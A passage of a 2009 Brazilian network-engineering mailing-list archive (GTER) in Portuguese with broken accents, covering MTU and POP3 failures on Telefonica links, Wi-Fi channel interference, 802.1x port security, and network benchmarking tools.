Cisco. Na > maior parte do tempo estou conectado. No entanto, em alguns instantes, > acontecem inexplic?veis quedas da comunica??o. > > A esta??o (de laborat?rio) ? um Vista SP1 32bits, usando uma placa de > rede "wireless" PCI da D-Link. Estou certo de que o sistema operacional > e os "drivers" est?o atualizados. As configura??es tamb?m est?o corretas > (SSID, criptografia, passphrase etc). A rela??o sinal-ru?do est? OK (s? > tenho divis?rias finas entre a sala onde est? o AP e a minha). > > Executando uma ferramenta de "sniffing" constato que, na mesma hora das > quedas, h? alguns APs de outras empresas pr?ximas deste pr?dio (na Av. > Paulista :P) operando no mesmo canal, que ? o 6. > > Pergunta de leigo na ?rea de Wi-Fi: "Clash" de freq??ncias ? uma causa > para desconex?o? Seria o caso de trocar o canal do nosso AP, digamos > para o 8 (no qual, at? onde percebi, nenhum ponto pr?ximo opera)? > > > -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From cleber-listas at inetweb.com.br Tue Jun 16 09:51:24 2009 From: cleber-listas at inetweb.com.br (Cleber - Listas) Date: Tue, 16 Jun 2009 09:51:24 -0300 Subject: [GTER] RES: MTU x Telefonica In-Reply-To: <724d72960906160542n5c41bc22wd9e26380a4e1e75e@mail.gmail.com> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <84eb7a820906160422r13684d77jd8c65dc14ed57331@mail.gmail.com> <724d72960906160542n5c41bc22wd9e26380a4e1e75e@mail.gmail.com> Message-ID: <336DA79CF132487FB8B291104E50E8D0@INETWEB.local> Chegamos a ter este problema entre Embratel e Intelig (nosso IDC). No caso, abri chamado junto ? Intelig que acionou a Embratel e solucionou o problema. Isso ocorreu somente na rede 189.60/14 na qual est? disponivel para a rede Virtua. Abra?os, Cleber -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Renato de Oliveira Diogo Enviada em: ter?a-feira, 16 de junho de 2009 09:42 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] MTU x Telefonica Temos um link com a telefonica e estamos com este problema (desde abril). O pior ? tentar convencer eles que o problema ? na rede deles. Aqui tivemos que modificar o MSS dos pacotes TCP para diminuir o tamanho do pacote... para minimizar o problema. Aqui nem a praga do MSN ficava em p?... A navega??o fica p?ssima... Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/16 Diogo Montagner : > Certa vez eu tive que baixar a mtu de um windows vista que estava > utilizando um discador pppoe para poder acessar sites como hotmail e > aplica??es como MSN. O engra?ado que isto somente acontecia com o > Windows Vista. Como o uso do Vista era tempor?rio, nunca investiguei a > fundo o porqu? disso estar acontecendo. Mas o link abaixo mostra que o problema n?o era (ou ?) novo. > http://www.asterisko.com.br/vista-speedy-e-mtu/ > > []s > ./diogo -montagner > > > 2009/6/16 Leandro Keffer > >> Amigo, tenho o mesmo problema em um cliente .... problema com porta >> 110 no link telefonica, a qual alega nao ter nenhuma problema O que >> fiz foi trocar por outro ip da faixa dela e resolveu aparentemente, >> mas demorou at? eles sugerirem esta id?ia, porem n?o sei o que >> ocorre, tentarei em um horario idle da empresa para muar o mtu e >> fazer o teste com o ip anterior que ocorria o problema >> >> >> 2009/6/15 Felipe Rayel >> >> > >> > Ser? que alguem aqui est? tendo o mesmo problema que eu? >> > Faz um semana que usu?rios na rede telef?nica n?o conseguem baixar >> > e-mail ou acessar o site do meu servidor. O outlook come?a a baixar >> > os e-mails e trava. Igual como se o MTU n?o estivesse correto. Ja >> > pedi para realizarem >> o >> > teste com o telnet na porta 110 e ocorre o mesmo problema. >> > >> > O mais estranho ? que notei que isso ocorre apenas em conex?es TCP. >> > O >> voip >> > que ? via UDP funciona normalmente. >> > >> > J? tentamos ligar na telefonica, s? que o checklist padr?o dos >> > atendentes n?o detecta este problema, pois eles conseguem navegar >> > normalmente. O problema s? ocorre com o meu servidor. J? descartei >> > a hip?tese de ser problema aqui, pois os demais clientes na >> > BRtelecom, etc, ?n?o tem tido >> este >> > problema. >> > >> > Para fazer um teste, eu modifquei o MTU ?de um cliente e deixei >> > fixo em 1350.. Curiosamente passou a funcionar tudo. >> > >> > Alguem sabe como posso solucionar isso ou tentar entrar em contato >> > com a Telefonica? Visto que pelo 0800 n?o consegui. >> > >> > Segue um traceroute de um cliente at? o meu servidor >> > >> > 1 ?192.168.254.254 (192.168.254.254) ?0.334 ms ?0.290 ms ?0.278 ms >> > 2 ?192.168.32.1 (192.168.32.1) ?51.917 ms ?30.002 ms ?30.801 ms >> > 3 ?201-0-4-65.dsl.telesp.net.br (201.0.4.65) ?29.254 ms * * >> > 4 ?pos13-3-vlm-sp-rotb-01.telemar.net.br (200.187.130.25) ?200.104 >> > ms >> > ?211.082 ms ?208.803 ms >> > 5 ?200.223.44.1 (200.223.44.1) ?197.610 ms ?203.722 ms ?201.464 ms >> > 6 ?pos3-0-0-vlm-sp-rotn-h01.telemar.net.br (201.18.246.6) ?208.188 >> > ms >> > ?207.880 ms ?208.880 ms >> > 7 ?pos4-0-0-vlo-sp-rotn-h01.telemar.net.br (201.18.249.106) ? >> > 209.118 ms >> > ?210.797 ms ?212.841 ms >> > 8 ?pos5-0-0-mpi-mg-rotn-h01.telemar.net.br (201.18.246.58) ?184.772 >> > ms >> > ?187.203 ms ?193.537 ms >> > 9 ?gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br >> > (201.18.252.110) >> > ?183.577 ms ?211.051 ms ?182.280 ms 10 ? >> > gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br >> > (201.18.251.196) >> > ?178.779 ms ?181.512 ms ?179.809 ms >> > 11 ?20118020002.host.telemar.net.br (201.18.20.2) ?224.655 ms ? >> > 312.999 >> ms >> > ?308.261 ms >> > 12 ?gelo.fertimitsui.com.br (201.18.21.3) ?209.396 ms ?199.956 ms >> ?201.248 >> > ms >> > >> > -- >> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter Nenhum v?rus encontrado nessa mensagem recebida. Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.70/2177 - Data de Lan?amento: 06/15/09 05:54:00 From dinhofile at gmail.com Tue Jun 16 09:42:50 2009 From: dinhofile at gmail.com (Adriano Anselmo) Date: Tue, 16 Jun 2009 09:42:50 -0300 Subject: [GTER] Problemas com Link Telefonica In-Reply-To: References: <4A36A080.5070105@conectcor.com.br> Message-ID: ta uma porcaria esta telefonica mesmo, o pior que clientes acha que ? o servidor com problemas, tem que ter interven?ao do MP e fechar esta empresa. 2009/6/15 Victor > Ol?, > > Perdi a rota para diversos estados, dentre eles os mais afetados ? o norte > e nordeste do pa?s. Ta come?ando a ficar complicado esses problemas > constantes da telef?nica. > > Att. Victor > ----- Original Message ----- > From: Welisson > To: gter at eng.registro.br > Sent: Monday, June 15, 2009 4:26 PM > Subject: [GTER] Problemas com Link Telefonica > > > Boa tarde a todos, > > Algu?m est? com dificuldades ou sem acesso com link telefonica ou > telefonia, no interior do estado SP. mas precisamente na regi?o de Bauru. > > Att. > > Welisson Tom? > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > __________ NOD32 4156 (20090615) Information __________ > > This message was checked by NOD32 antivirus system. > http://www.eset.com > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Adriano Anselmo From emarques at diveo.net.br Tue Jun 16 09:45:14 2009 From: emarques at diveo.net.br (Everton da Silva Marques) Date: Tue, 16 Jun 2009 09:45:14 -0300 Subject: [GTER] =?iso-8859-1?q?Mensura=E7=E3o_da_Rede?= In-Reply-To: <1245093684.4865.4.camel@giba-ti.selbetti.local> References: <1245093684.4865.4.camel@giba-ti.selbetti.local> Message-ID: Gilberto Nunes escreveu: > > Estou procurando por ferramentas que possa me mostrar a medi??o de > performance de rede entre hosts e entre estes e a Rede > Interna/Externa Este artigo pode ser ?til: Benchmarking network performance with Network Pipemeter, LMbench, and nuttcp http://www.linux.com/feature/144532 Everton From emoura10 at yahoo.com.br Tue Jun 16 16:48:56 2009 From: emoura10 at yahoo.com.br (Edson Moura) Date: Tue, 16 Jun 2009 12:48:56 -0700 (PDT) Subject: [GTER] =?iso-8859-1?q?RES=3A__seguran=E7a_de_acesso_fisico_na_red?= =?iso-8859-1?q?e?= Message-ID: <535272.71437.qm@web110202.mail.gq1.yahoo.com> Como foi mencionado em outros emails, uma das solu??es seria adotar 802.1x desde que o switch o suporte. Este protocolo somente libera a porta de supplicant (usu?rio ou dispositivo) se este autenticar num servidor RADIUS (ex. FreeRadius / IAS, etc) Para aprofundar um pouco mais, sugiro que leia alguma bibliografia ou no site de algum fabricante. abra?o, Edson ? --- Em seg, 15/6/09, Cleber - Listas escreveu: De: Cleber - Listas Assunto: [GTER] RES: seguran?a de acesso fisico na rede Para: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" Data: Segunda-feira, 15 de Junho de 2009, 16:10 Oi Alexandre, Voce pode configurar no DHCP para ter sempre o mesmo IP para um determinado MAC e outros MAC n?o cadastrados n?o terem nenhum IP. Se n?o me engano, pelo switch ? possivel ter uma restri??o de porta x MAC, por?m, ser? uma grande m?o de obra ao cliente. Li isso em manual de switch 3com mas nunca apliquei. Outra solu??o tamb?m ? ele ter uma boa politica de senhas/acessos via AD ou outros para permitir acessos ? shares, proxy, etc, somente com autentica??o. Abra?os -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Alexandre J. Correa - Onda Internet Enviada em: segunda-feira, 15 de junho de 2009 15:55 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: [GTER] seguran?a de acesso fisico na rede Boa tarde !! Um cliente andou me questionando sobre acesso 'fisico' a rede dele, ele me explicou a seguinte situa??o: - Uma pessoa conecta um notebook em alguma tomada de rede, ele tem um dhcp na rede onde atribui ips automaticamente... esta maquina vai ficar fora do DOMINIO da rede sem acesso a documentos etc etc.. a preocupa??o dele ? NAO permitir aquela maquina de maneira alguma acessar nada, mesmo a pessoa colocando um ip manualmente... para este caso sugeri autentica??o via 802.1x de todas as esta??es, incluindo o switch fazer a autentica??o em um servidor central de chaves usando radius... existem outras possibilidades ? uma outra solu??o que ele me questionou foi: Existe uma maneira de filtrar quais macs podem conectar fisicamente naquelas portas ? resumindo, ele precisa permitir conexao fisica somente a maquinas autorizadas .. alguem conhece alguma solu??o ? obrigado !! -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 READY ! -- gter list? ? https://eng.registro.br/mailman/listinfo/gter Nenhum v?rus encontrado nessa mensagem recebida. Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.70/2177 - Data de Lan?amento: 06/15/09 05:54:00 -- gter list? ? https://eng.registro.br/mailman/listinfo/gter Veja quais s?o os assuntos do momento no Yahoo! +Buscados http://br.maisbuscados.yahoo.com From fernandesh at yahoo.com Tue Jun 16 21:25:52 2009 From: fernandesh at yahoo.com (Hilton Garcia Fernandes) Date: Tue, 16 Jun 2009 17:25:52 -0700 (PDT) Subject: [GTER] cache P2P na rede GVT ??? Message-ID: <495716.60368.qm@web112214.mail.gq1.yahoo.com> Prezados, muito mais tarde do que seria razo?vel responder, encontrei algumas solu??es de P2P caching em Software Livre. A mais madura e com desenvolvimento continuado ? mesmo http://nsl.cs.sfu.ca/wiki/index.php/Modeling_and_Caching_of_P2P_Traffic Obrigado, hilton --- On Tue, 5/26/09, Julio Arruda wrote: > From: Julio Arruda > Subject: Re: [GTER] cache P2P na rede GVT ??? > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > Date: Tuesday, May 26, 2009, 5:22 PM > Gustavo Santos wrote: > > Existe algo parecido para fazer cache de p2p / video > open source? Ou as > > grandes empresas que fornecem a solu??o fazem um > mensal?o para os possiveis > > desenvolvedores a n?o criar algo aberto e free? > > As duas empresas que conheco? no mercado, sao a Oversi > e PeerApp (ambas mencionadas aqui), e nunca escutei de > nenhum cliente nosso de DPI, sobre solucoes 'internas' ou > open-source. > Mas de qualquer forma, nao entendi a pergunta...:-) > > > > > 2009/5/26 Rubens Kuhl > > > >>> sinceramente, n?o sei se n?o vale. Mas > nessa > >>> conversinha de que lei tal n?o vale aqui, t? > a? > >>> a RIAA processando todo mundo, o TPB, que > >>> pelo fato de estar na Su?cia, era imune a > processo, > >>> t? a? sendo processada e etc. Eu na d?vida, > n?o > >>> arriscaria... ;) > >> Para balancear a percep??o de riscos: > >> 1) A APCM (http://www.apcm.org.br/) - Associa??o > antipirataria de > >> cinema e m?sica - recentemente abriu uma vaga com > forte perfil > >> "online", sugerindo que as atividades hoje > limitadas aos suportes > >> f?sicas (CDs, DVDs etc.) poderiam se extender > para essa atividade. > >> 2) Como contato de bloco de IPs eu recebo uma > d?zia de notifica??es > >> di?rias da RIAA, ESA e cong?neres diariamente... > se essas notifica??es > >> fossem enviadas por canais jur?dicos apropriados > e esses IPs fossem de > >> equipamentos da empresa, ai dos diretores > estatut?rios. > -- > gter list? ? https://eng.registro.br/mailman/listinfo/gter > From juliano at viasite.com.br Wed Jun 17 10:46:35 2009 From: juliano at viasite.com.br (Juliano S. Nascimento) Date: Wed, 17 Jun 2009 10:46:35 -0300 (BRT) Subject: [GTER] Banda larga clandestina substitui lan houses na periferia de SP In-Reply-To: References: Message-ID: <36428.192.168.1.6.1245246395.squirrel@webmail.viasite.com.br> > http://g1.globo.com/Noticias/SaoPaulo/0,,MUL1190644-5605,00-BANDA+LARGA+CLANDESTINA+SUBSTITUI+LAN+HOUSES+NA+PERIFERIA+DE+SP.html > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > Bom dia a Todos, Percebe-se que o servi?o j? ? automatizado com login x senha, na possibilidade do n?o pagamento, rsrs.. -- From vbenincasa.listas at gmail.com Tue Jun 16 12:26:22 2009 From: vbenincasa.listas at gmail.com (Victor Benincasa) Date: Tue, 16 Jun 2009 12:26:22 -0300 Subject: [GTER] MTU x Telefonica References: <4A33AE1B.7010106@jarruda.com><4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> Message-ID: <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> Mesmo problema aqui com um cliente, que n?o consegue receber e-mails, entretanto, consegue acessar outros servi?os nossos normalmente (http, smtp, etc). Fizemos v?rios testes atrav?s da rede do cliente, inclusive simulamos uma conex?o manual ao servidor pop [1], e a conex?o ? realizada normalmente (autentica??o e listagem de mensagens [2]), mas a comunica??o para ap?s a tentativa de baixar qualquer mensagem [3]. Verificando os logs do outlook, a conex?o para no mesmo ponto, a? ele mostra a mensagem "timeout - o servidor n?o respondeu em x segundos..." Eliminamos qualquer interfer?ncia poss?vel (firewall, roteador, modem, etc). Tentamos tamb?m conex?o atrav?s de porta alternativa (995), usando SSL inclusive, mas o problema persiste, restou mesmo algum problema ou filtro da Telec?mica. Sugerimos ao cliente ligar para eles e solicitar uma troca de IP para ver se ajuda (o IP dele ? fixo), s? que at? para isso o suporte deles d? canseira! [1] telnet host 110 [2] comandos USER / PASS e LIST [3] comando RETR msg -- Victor Benincasa http://netbit.com.br ----- Original Message ----- From: "Leandro Keffer" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Tuesday, June 16, 2009 12:03 AM Subject: Re: [GTER] MTU x Telefonica Amigo, tenho o mesmo problema em um cliente .... problema com porta 110 no link telefonica, a qual alega nao ter nenhuma problema O que fiz foi trocar por outro ip da faixa dela e resolveu aparentemente, mas demorou at? eles sugerirem esta id?ia, porem n?o sei o que ocorre, tentarei em um horario idle da empresa para muar o mtu e fazer o teste com o ip anterior que ocorria o problema 2009/6/15 Felipe Rayel > > Ser? que alguem aqui est? tendo o mesmo problema que eu? > Faz um semana que usu?rios na rede telef?nica n?o conseguem baixar e-mail > ou acessar o site do meu servidor. O outlook come?a a baixar os e-mails e > trava. Igual como se o MTU n?o estivesse correto. Ja pedi para realizarem > o > teste com o telnet na porta 110 e ocorre o mesmo problema. > > O mais estranho ? que notei que isso ocorre apenas em conex?es TCP. O voip > que ? via UDP funciona normalmente. > > J? tentamos ligar na telefonica, s? que o checklist padr?o dos atendentes > n?o detecta este problema, pois eles conseguem navegar normalmente. O > problema s? ocorre com o meu servidor. J? descartei a hip?tese de ser > problema aqui, pois os demais clientes na BRtelecom, etc, n?o tem tido > este > problema. > > Para fazer um teste, eu modifquei o MTU de um cliente e deixei fixo em > 1350.. Curiosamente passou a funcionar tudo. > > Alguem sabe como posso solucionar isso ou tentar entrar em contato com a > Telefonica? Visto que pelo 0800 n?o consegui. > > Segue um traceroute de um cliente at? o meu servidor > > 1 192.168.254.254 (192.168.254.254) 0.334 ms 0.290 ms 0.278 ms > 2 192.168.32.1 (192.168.32.1) 51.917 ms 30.002 ms 30.801 ms > 3 201-0-4-65.dsl.telesp.net.br (201.0.4.65) 29.254 ms * * > 4 pos13-3-vlm-sp-rotb-01.telemar.net.br (200.187.130.25) 200.104 ms > 211.082 ms 208.803 ms > 5 200.223.44.1 (200.223.44.1) 197.610 ms 203.722 ms 201.464 ms > 6 pos3-0-0-vlm-sp-rotn-h01.telemar.net.br (201.18.246.6) 208.188 ms > 207.880 ms 208.880 ms > 7 pos4-0-0-vlo-sp-rotn-h01.telemar.net.br (201.18.249.106) 209.118 ms > 210.797 ms 212.841 ms > 8 pos5-0-0-mpi-mg-rotn-h01.telemar.net.br (201.18.246.58) 184.772 ms > 187.203 ms 193.537 ms > 9 gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br (201.18.252.110) > 183.577 ms 211.051 ms 182.280 ms > 10 gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br (201.18.251.196) > 178.779 ms 181.512 ms 179.809 ms > 11 20118020002.host.telemar.net.br (201.18.20.2) 224.655 ms 312.999 ms > 308.261 ms > 12 gelo.fertimitsui.com.br (201.18.21.3) 209.396 ms 199.956 ms 201.248 > ms > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From daviperes at gmail.com Wed Jun 17 13:56:37 2009 From: daviperes at gmail.com (davi peres) Date: Wed, 17 Jun 2009 13:56:37 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <4A38F3DE.15A6.0046.0@trf3.jus.br> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: observe a frequencia de seu AP normalmente 2.4 giga hertz e veja tambem se tem algum aparelho telefonico por ai que usa esta frequencia. tente mudar a frequencia 2009/6/17 MARLON BORBA > Srs., > > Como n?o sou um profundo conhecedor de Wi-Fi, recorro aos "gurus" da > GTER. > > Pr?ximo da minha mesa, a uns 10 metros no m?ximo, h? um AP da Cisco. Na > maior parte do tempo estou conectado. No entanto, em alguns instantes, > acontecem inexplic?veis quedas da comunica??o. > > A esta??o (de laborat?rio) ? um Vista SP1 32bits, usando uma placa de > rede "wireless" PCI da D-Link. Estou certo de que o sistema operacional > e os "drivers" est?o atualizados. As configura??es tamb?m est?o corretas > (SSID, criptografia, passphrase etc). A rela??o sinal-ru?do est? OK (s? > tenho divis?rias finas entre a sala onde est? o AP e a minha). > > Executando uma ferramenta de "sniffing" constato que, na mesma hora das > quedas, h? alguns APs de outras empresas pr?ximas deste pr?dio (na Av. > Paulista :P) operando no mesmo canal, que ? o 6. > > Pergunta de leigo na ?rea de Wi-Fi: "Clash" de freq??ncias ? uma causa > para desconex?o? Seria o caso de trocar o canal do nosso AP, digamos > para o 8 (no qual, at? onde percebi, nenhum ponto pr?ximo opera)? > > > -- > > Abra?os, > > Marlon Borba, CISSP, APC DataCenter Associate > T?cnico Judici?rio ? Seguran?a da Informa??o > Comiss?o Local de Resposta a Incidentes - CLRI > TRF 3 Regi?o > (11) 3012-1581 > -- > Practically no IT system is risk free. > (NIST Special Publication 800-30) > -- > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From itamar at ispbrasil.com.br Wed Jun 17 13:50:55 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Wed, 17 Jun 2009 13:50:55 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <4A38F3DE.15A6.0046.0@trf3.jus.br> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: n?o deveria estar caindo, principalmente a 10 metros, independente de tiver outro APE no mesmo canal. 2009/6/17 MARLON BORBA : > Srs., > > Como n?o sou um profundo conhecedor de Wi-Fi, recorro aos "gurus" da > GTER. > > Pr?ximo da minha mesa, a uns 10 metros no m?ximo, h? um AP da Cisco. Na > maior parte do tempo estou conectado. No entanto, em alguns instantes, > acontecem inexplic?veis quedas da comunica??o. > > A esta??o (de laborat?rio) ? um Vista SP1 32bits, usando uma placa de > rede "wireless" PCI da D-Link. Estou certo de que o sistema operacional > e os "drivers" est?o atualizados. As configura??es tamb?m est?o corretas > (SSID, criptografia, passphrase etc). A rela??o sinal-ru?do est? OK (s? > tenho divis?rias finas entre a sala onde est? o AP e a minha). > > Executando uma ferramenta de "sniffing" constato que, na mesma hora das > quedas, h? alguns APs de outras empresas pr?ximas deste pr?dio (na Av. > Paulista :P) operando no mesmo canal, que ? o 6. > > Pergunta de leigo na ?rea de Wi-Fi: "Clash" de freq??ncias ? uma causa > para desconex?o? Seria o caso de trocar o canal do nosso AP, digamos > para o 8 (no qual, at? onde percebi, nenhum ponto pr?ximo opera)? > > > -- > > Abra?os, > > Marlon Borba, CISSP, APC DataCenter Associate > T?cnico Judici?rio ? Seguran?a da Informa??o > Comiss?o Local de Resposta a Incidentes - CLRI > TRF 3 Regi?o > (11) 3012-1581 > -- > Practically no IT system is risk free. > (NIST Special Publication 800-30) > -- > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From itamar at ispbrasil.com.br Wed Jun 17 14:01:37 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Wed, 17 Jun 2009 14:01:37 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <4A38F3DE.15A6.0046.0@trf3.jus.br> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: e' mais provavel que seja uma parede no meio do caminho do que o canal. 2009/6/17 MARLON BORBA : > Srs., > > Como n?o sou um profundo conhecedor de Wi-Fi, recorro aos "gurus" da > GTER. > > Pr?ximo da minha mesa, a uns 10 metros no m?ximo, h? um AP da Cisco. Na > maior parte do tempo estou conectado. No entanto, em alguns instantes, > acontecem inexplic?veis quedas da comunica??o. > > A esta??o (de laborat?rio) ? um Vista SP1 32bits, usando uma placa de > rede "wireless" PCI da D-Link. Estou certo de que o sistema operacional > e os "drivers" est?o atualizados. As configura??es tamb?m est?o corretas > (SSID, criptografia, passphrase etc). A rela??o sinal-ru?do est? OK (s? > tenho divis?rias finas entre a sala onde est? o AP e a minha). > > Executando uma ferramenta de "sniffing" constato que, na mesma hora das > quedas, h? alguns APs de outras empresas pr?ximas deste pr?dio (na Av. > Paulista :P) operando no mesmo canal, que ? o 6. > > Pergunta de leigo na ?rea de Wi-Fi: "Clash" de freq??ncias ? uma causa > para desconex?o? Seria o caso de trocar o canal do nosso AP, digamos > para o 8 (no qual, at? onde percebi, nenhum ponto pr?ximo opera)? > > > -- > > Abra?os, > > Marlon Borba, CISSP, APC DataCenter Associate > T?cnico Judici?rio ? Seguran?a da Informa??o > Comiss?o Local de Resposta a Incidentes - CLRI > TRF 3 Regi?o > (11) 3012-1581 > -- > Practically no IT system is risk free. > (NIST Special Publication 800-30) > -- > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From renato at redetuxnet.com.br Wed Jun 17 14:00:53 2009 From: renato at redetuxnet.com.br (Renato Machado) Date: Wed, 17 Jun 2009 14:00:53 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <9c0c824e0906170955j246525d0rf540c638b5525f4a@mail.gmail.com> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> <9c0c824e0906170955j246525d0rf540c638b5525f4a@mail.gmail.com> Message-ID: <94babad20906171000o438a4b52q4ef8f5195bed8bd8@mail.gmail.com> Os canais 1, 6 e 11 n?o se sobrep?e mais interferem ent?o no caso use o canal 1 e veja se melhora, as divis?rias n?o vai fazer diferen?a. Att, 2009/6/17 Emiliano Martins > Marlon, > N?o sei te explicar exatamente porque, mas na pr?tica acontece de um outro > AP ou at? mesmo um telefone sem fio derrubar a sua conex?o wireless se > estiver no mesmo canal, e a grande maioria dos APs e Telefones sem fio ou > vem configurados de f?brica no canal 6 ou no 11. Eu sempre uso 8ou 9 para > evitar esse tipo de problema. Mas ? sempre bom dar uma "sniffada" na ?rea > antes de escolher qual canal usar. > > Abra?o > > > > 2009/6/17 MARLON BORBA > > > Srs., > > > > Como n?o sou um profundo conhecedor de Wi-Fi, recorro aos "gurus" da > > GTER. > > > > Pr?ximo da minha mesa, a uns 10 metros no m?ximo, h? um AP da Cisco. Na > > maior parte do tempo estou conectado. No entanto, em alguns instantes, > > acontecem inexplic?veis quedas da comunica??o. > > > > A esta??o (de laborat?rio) ? um Vista SP1 32bits, usando uma placa de > > rede "wireless" PCI da D-Link. Estou certo de que o sistema operacional > > e os "drivers" est?o atualizados. As configura??es tamb?m est?o corretas > > (SSID, criptografia, passphrase etc). A rela??o sinal-ru?do est? OK (s? > > tenho divis?rias finas entre a sala onde est? o AP e a minha). > > > > Executando uma ferramenta de "sniffing" constato que, na mesma hora das > > quedas, h? alguns APs de outras empresas pr?ximas deste pr?dio (na Av. > > Paulista :P) operando no mesmo canal, que ? o 6. > > > > Pergunta de leigo na ?rea de Wi-Fi: "Clash" de freq??ncias ? uma causa > > para desconex?o? Seria o caso de trocar o canal do nosso AP, digamos > > para o 8 (no qual, at? onde percebi, nenhum ponto pr?ximo opera)? > > > > > > -- > > > > Abra?os, > > > > Marlon Borba, CISSP, APC DataCenter Associate > > T?cnico Judici?rio ? Seguran?a da Informa??o > > Comiss?o Local de Resposta a Incidentes - CLRI > > TRF 3 Regi?o > > (11) 3012-1581 > > -- > > Practically no IT system is risk free. > > (NIST Special Publication 800-30) > > -- > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > Emiliano Martins > iK1 Tecnologia Ltda > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Renato Silva Machado Gerente de TI + 55 75 8102-8969 Cel + 55 75 8197-6466 Cel + 55 75 3264-1825 Fixo Renato at redetuxnet.com.br Visite o nosso site - www.redetuxnet.com.br - TuxNet Materiais e Servi?os de Inform?tica LTDA. Esta mensagem e seu conte?do - inclusive anexos - s?o dedicados exclusivamente para seu(s) destinat?rio(s), podendo conter informa??es confid?nciais e/ou legalmente privilegiadas. Qualquer modifica??o, retransmiss?o, dissemina??o, impress?o ou utiliza??o n?o autorizada fica estritamente proibida. Se voc? recebeu esta mensagem por engano, por favor informe o remetente e delete o material e as c?pias de sua m?quina From rikardo at gmail.com Wed Jun 17 14:01:15 2009 From: rikardo at gmail.com (Ricardo Godoy) Date: Wed, 17 Jun 2009 14:01:15 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <4A38F3DE.15A6.0046.0@trf3.jus.br> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: <145559810906171001m1d5cbca2g7c457b0e2e537558@mail.gmail.com> Caro, J? passei por algo semelhante, a mudan?a de canal resolveu o meu problema. D? preferencia por canais de "frequencia limpa" = 1 / 3 / 6 / 9 / 11. Por padr?o os AP?s sao configurados no canal 6, de preferencia selecione um dos canais citados, desde que voce nao tenha vizinhos operando no mesmo canal... Caso tenha vizinhos compartilhando todos os canais, selecione o de menor potencia... Acredito que isso deve resolver.. Boa sorte. Ricardo 2009/6/17 MARLON BORBA > Srs., > > Como n?o sou um profundo conhecedor de Wi-Fi, recorro aos "gurus" da > GTER. > > Pr?ximo da minha mesa, a uns 10 metros no m?ximo, h? um AP da Cisco. Na > maior parte do tempo estou conectado. No entanto, em alguns instantes, > acontecem inexplic?veis quedas da comunica??o. > > A esta??o (de laborat?rio) ? um Vista SP1 32bits, usando uma placa de > rede "wireless" PCI da D-Link. Estou certo de que o sistema operacional > e os "drivers" est?o atualizados. As configura??es tamb?m est?o corretas > (SSID, criptografia, passphrase etc). A rela??o sinal-ru?do est? OK (s? > tenho divis?rias finas entre a sala onde est? o AP e a minha). > > Executando uma ferramenta de "sniffing" constato que, na mesma hora das > quedas, h? alguns APs de outras empresas pr?ximas deste pr?dio (na Av. > Paulista :P) operando no mesmo canal, que ? o 6. > > Pergunta de leigo na ?rea de Wi-Fi: "Clash" de freq??ncias ? uma causa > para desconex?o? Seria o caso de trocar o canal do nosso AP, digamos > para o 8 (no qual, at? onde percebi, nenhum ponto pr?ximo opera)? > > > -- > > Abra?os, > > Marlon Borba, CISSP, APC DataCenter Associate > T?cnico Judici?rio ? Seguran?a da Informa??o > Comiss?o Local de Resposta a Incidentes - CLRI > TRF 3 Regi?o > (11) 3012-1581 > -- > Practically no IT 